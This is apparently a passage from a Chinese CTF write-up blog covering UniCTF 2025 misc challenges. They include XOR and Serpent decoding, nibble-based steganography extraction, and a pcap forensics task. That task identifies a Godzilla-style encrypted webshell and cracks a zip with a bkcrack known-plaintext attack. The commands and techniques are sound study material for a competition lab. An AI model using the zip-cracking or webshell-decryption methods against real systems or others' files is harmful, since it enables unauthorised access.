<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">RinDSA|W6dlkbXsob</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>文件名是7，尝试了凯撒密码偏移量和各种解密后发现是异或，和7异或拿到前半段</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260212163600793.png" class title="image-20260212163600793">

<p>flag</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">UniCTF&#123;P1ckle_the_Great_to01&#125;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>



<h3 id="Sign-in"><a href="#Sign-in" class="headerlink" title="Sign in"></a>Sign in</h3><p>官方签到题</p>
<p>我们在解压缩包的时候看到注释</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260212164314627.png" class title="image-20260212164314627">

<p>进行base64解码发现是密钥<strong>SecretKey</strong></p>
<p>然后根据附件的名字猜测是Serpent解密</p>
<p>找了好几个网站，还是这个网站最好用，之前写题目也是这个<a target="_blank" rel="noopener" href="http://serpent.online-domain-tools.com/#google_vignette">Serpent Encryption – Easily encrypt or decrypt strings or files</a></p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260212164846305.png" class title="image-20260212164846305">

<p>flag</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">UniCTF&#123;Serpentine_Secrets&#125;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>





<h3 id="总裁四比特-这能玩？"><a href="#总裁四比特-这能玩？" class="headerlink" title="总裁四比特,这能玩？"></a>总裁四比特,这能玩？</h3><p>题目给的是一张jpg图片，使用010editor打开发现文件尾后面还有数据</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260212180057389.png" class title="image-20260212180057389">

<p>文件尾后面的数据发现和其他类型的文件头都对应不上。</p>
<p>尝试使用foremost进行文件提取，发现提取出来两张一样的png图片，也就是这个把我带偏了，我以为是盲水印等这些双图片的隐写</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260212180528246.png" class title="image-20260212180528246">

<p>看了wp发现，那个额外的数据如果取每个16进制的高位连起来就是504B0304，就是zip的文件头，于是直接高位提取</p>
<div class="code-container" code-lang="Python"><div class="codebox"><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&#x27;flag.dat&#x27;</span>, <span class="string">&#x27;rb&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    data = f.read()</span><br><span class="line"></span><br><span class="line">high = [(b &gt;&gt; <span class="number">4</span>) &amp; <span class="number">0x0F</span> <span class="keyword">for</span> b <span class="keyword">in</span> data]</span><br><span class="line">result = <span class="built_in">bytes</span>((high[i] &lt;&lt; <span class="number">4</span>) | high[i+<span class="number">1</span>] <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="built_in">len</span>(high)-<span class="number">1</span>, <span class="number">2</span>))</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&#x27;output.dat&#x27;</span>, <span class="string">&#x27;wb&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    f.write(result)</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>然后我们得到zip文件</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260212180825399.png" class title="image-20260212180825399">

<p>在复制16进制的时候可能出现一些问题，导致嘉豪两个字没有了，提示文件损坏，按理来说是不会损坏的，但是这点修复能力还是解压软件还是有的。</p>
<p>解压得到一张和foremost提取出来的看起来一样的嘉豪.png，但是文件内容不一样，我们在文件末尾找到zip文件，提取出来解压得到flag</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260212181144571.png" class title="image-20260212181144571">

<p>flag</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">UniCTF&#123;Y0u_4r3_4_6r347_h4ck3r_!&#125;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>





<h3 id="BlueBreath"><a href="#BlueBreath" class="headerlink" title="BlueBreath"></a>BlueBreath</h3><p>题目提示：巨兽并不会凭空消失，它只是换了一种频率在呼吸</p>
<p>我们查看流量包，发现又被扫目录了，直接过滤200响应，和POST传参发现有shell.php</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http.response.code == 200 or http.request and http.request.method == &quot;POST&quot;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>发现疑似异或加密的webshell，然后结合提示猜测是哥斯拉webshell</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260212201019140.png" class title="image-20260212201019140">

<p>但是没有看到题目提示的密钥，尝试爆破密钥也失败了。</p>
<p>然后发现访问index.php的时候发现有文件上传</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260212201201772.png" class title="image-20260212201201772">

<p>提取出来zip文件里面是一个png文件，然后发现有加密。尝试爆破也失败了。</p>
<p>看了wp，没想到没有对应文件也可以进行明文攻击，甚至明文只是png文件的文件头</p>
<p>使用bkcrack进行明文攻击</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bkcrack -C hint.zip -c hint.png -x 0 89504E470D0A1A0A0000000D49484452</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>拿到不知道干什么用的密钥</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260212201519389.png" class title="image-20260212201519389">

<p>问了ds，可以通过密钥再还原出文件</p>
<div class="code-container" code-lang="Bash"><div class="codebox"><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bkcrack -C hint.zip -c hint.png -k 24cc690a 59f6451b e4fbbab0 -d hint.png</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>拿到图片</p>
<p> 然后我尝试了zsteg没发现什么东西，但是毕竟脚本通道没扫全，还是得自己去看看</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260212203957596.png" class title="image-20260212203957596">

<p>发现提示，将密钥MD5值前16位作为异或和aes的密钥是webshell的基本操作</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">2dc3ef5ff0c670158756fb801d3a95d5</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>然后尝试解密</p>
<img lazyload src="/assets/images/loading.gif" data-lazy-src="/2026/02/11/UniCTF-2025/image-20260212204318863.png" class title="image-20260212204318863">

<p>直接返回了flag</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">UniCTF&#123;w1reSha3k_easy_or_hard&#125;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>











</div><div class="post-reward"><div class="post-reward-btn" title="赞赏作者"><img src="/assets/images/svg/uc/uc-gift.svg" class="icon noview" alt="Icon"><span></span></div><div class="post-reward-content"><div class="post-reward-text"></div><div class="post-reward-list"><a href="/null" target="_blank">致谢名单</a></div></div></div><div class="post-copyright"><div class="post-copyright-info">本作品由 Regulus 于 2026-02-11 19:52:05 发布</div><div class="post-copyright-link"><span>作品地址：<a href="http://example.com/2026/02/11/UniCTF-2025/">UniCTF_2025</a></span><button class="copy-text" type="button" data-text="http://example.com/2026/02/11/UniCTF-2025/">复制</button></div><div class="post-copyright-detail">除特别声明外，本站作品均采用 <a href='https://creativecommons.org/licenses/by-nc-sa/4.0/' title='Attribution-NonCommercial-ShareAlike' target='_blank'>CC BY-NC-SA 4.0</a> 许可协议，转载请注明来自 <a href='/'>Mei的小窝</a></div><img class="post-copyright-icon noview" src="/assets/images/Hexo-Theme-MEOW.png" alt="Logo"/></div><div class="post-tail-tags"><a class="post-tail-tags-link" href="/tags/UniCTF/" rel="tag">UniCTF</a></div></div><aside id="post-sidebar" status="show"><div id="toc-container"><div class="toc-title"><img src="/assets/images/svg/ta/ta-toc.svg" class="icon noview" alt="Icon"><span>目录</span></div><div class="toc-content" id="toc-div"><ol class="toc-list"><li class="toc-list-item toc-list-level-1"><a class="toc-list-link" href="#UniCTF-2025"><span class="toc-list-text">UniCTF_2025</span></a><ol class="toc-list-child"><li class="toc-list-item toc-list-level-2"><a class="toc-list-link" href="#1-Web"><span class="toc-list-text">1.Web</span></a><ol class="toc-list-child"><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#GlyphWeaver"><span class="toc-list-text">GlyphWeaver</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#SecureDoc"><span class="toc-list-text">SecureDoc</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#ez-upload"><span class="toc-list-text">ez_upload</span></a></li></ol></li><li class="toc-list-item toc-list-level-2"><a class="toc-list-link" href="#2-Misc"><span class="toc-list-text">2.Misc</span></a><ol class="toc-list-child"><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#%E5%B7%A5%E5%8E%82%E5%BA%94%E6%80%A5%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90"><span class="toc-list-text">工厂应急流量分析</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#Silent-Resolver"><span class="toc-list-text">Silent Resolver</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#%E6%88%AA%E5%8F%96%E7%9A%84%E7%BA%BF%E7%B4%A2"><span class="toc-list-text">截取的线索</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#Sign-in"><span class="toc-list-text">Sign in</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#%E6%80%BB%E8%A3%81%E5%9B%9B%E6%AF%94%E7%89%B9-%E8%BF%99%E8%83%BD%E7%8E%A9%EF%BC%9F"><span class="toc-list-text">总裁四比特,这能玩？</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#BlueBreath"><span class="toc-list-text">BlueBreath</span></a></li></ol></li></ol></li></ol></div></div></aside></div></div><div id="toolbar" hide=""><div id="toolbar-setting-container" hide=""><div class="toolbar-item"><button id="tool-color-mode" title="深色模式" type="button"><img src="/assets/images/svg/ta/ta-moon.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button class="copy-text" id="tool-share" title="分享" type="button" data-text="http://example.com/2026/02/11/UniCTF-2025/"><img src="/assets/images/svg/ta/ta-share.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-font-size-plus" title="放大字体" type="button"><img src="/assets/images/svg/ta/ta-text-plus.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-font-size-minus" title="缩小字体" type="button"><img src="/assets/images/svg/ta/ta-text-minus.svg" class="icon noview" alt="Icon"></button></div></div><div class="toolbar-container"><div class="toolbar-item"><button id="tool-setting" title="设置" type="button"><img src="/assets/images/svg/ta/ta-setting.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-toc" title="目录" type="button"><img src="/assets/images/svg/ta/ta-toc.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-gototop" title="返回顶部" type="button"><img src="/assets/images/svg/ta/ta-up.svg" class="icon noview" alt="Icon"></button></div></div></div><div class="search-overlay"><div class="search-container"><div class="search-header"><div class="search-title"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M10 10m-7 0a7 7 0 1 0 14 0a7 7 0 1 0 -14 0" /><path d="M21 21l-6 -6" /></svg>
搜索</div><div class="search-close-btn"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M12 21a9 9 0 0 0 9 -9a9 9 0 0 0 -9 -9a9 9 0 0 0 -9 9a9 9 0 0 0 9 9z" /><path d="M9 8l6 8" /><path d="M15 8l-6 8" /></svg></div></div><div class="search-input-box"><input id="search-input" type="search" placeholder="请输入关键词进行站内搜索……" value="" maxlength="80"/></div><div class="search-result-container"><div class="search-result-icon"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M10 10m-7 0a7 7 0 1 0 14 0a7 7 0 1 0 -14 0" /><path d="M21 21l-6 -6" /></svg></div></div></div></div></main><footer><div class="footer"><div id="footer-copyright">© 2024 - 2026 <span>💗</span> <a href="/null">Regulus</a></div><div id="footer-info"><div id="footer-framework">🚀本站由 <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/chanwj/hexo-theme-meow" title="3.2.0" target="_blank">Meow</a> 强力驱动</div><div id="footer-runtime"><span id="runtime" data-startdate="2024-04-02T22:16:20.000Z">🌻已稳定运行.年.月.天</span></div></div><div id="footer-statistic"><span>共撰写172篇文章，全站共482.7k字</span></div><div id="footer-pageview"><div id="container_site_pv"><span>🔥总访问量</span><span id="vercount_value_site_pv"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none"  stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M12 6l0 -3" /><path d="M16.25 7.75l2.15 -2.15" /><path d="M18 12l3 0" /><path d="M16.25 16.25l2.15 2.15" /><path d="M12 18l0 3" /><path d="M7.75 16.25l-2.15 2.15" /><path d="M6 12l-3 0" /><path d="M7.75 7.75l-2.15 -2.15" /></svg></span></div><div id="container_site_uv"><span>🐈访客人数</span><span id="vercount_value_site_uv"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none"  stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M12 6l0 -3" /><path d="M16.25 7.75l2.15 -2.15" /><path d="M18 12l3 0" /><path d="M16.25 16.25l2.15 2.15" /><path d="M12 18l0 3" /><path d="M7.75 16.25l-2.15 2.15" /><path d="M6 12l-3 0" /><path d="M7.75 7.75l-2.15 -2.15" /></svg></span></div></div></div></footer><div class="scripts"><script>const GLOBALCONFIG = {
  root: '/',
  toolbar: true,
  lazyload_src: '/assets/images/loading.gif',
  friends: false,
  codeblock: true,
  share_text: '',
  onblur_title: 'Please Come Back～✧(´▽`ʃ♡ƪ)',
  mouse_click: false,
  notify:{
    enable: false,
    info: '复制成功～转载请标注本文地址',
    f12_info: '开发者模式已打开，请遵循本站版权协议'
  },
  search: {
    enable: true,
    path: 'search.json',
    local: {
      top_n_per_article: 1,
      preload: false
    }
  },
  encrypt: false,
};
</script><script>if (!localStorage.getItem('color-mode')) {
  localStorage.setItem('color-mode', 'light' || 'light');
}
document.body.setAttribute('data-mode', localStorage.getItem('color-mode'));
</script>
<script src="/js/theme/tools/utils.js"></script>

<script src="/js/plugins/dist/lazyload.min.js"></script>

<script src="/js/plugins/view-image.min.js"></script>
<script src="https://events.vercount.one/js" defer="defer"></script><script>if (localStorage.getItem('font-size')) {
  document.querySelector('.post').style.fontSize = localStorage.getItem('font-size') + 'px';
}
</script>
<script src="/js/plugins/dist/search.js"></script>

<script src="/js/main.js" type="module"></script>
</div></body></html>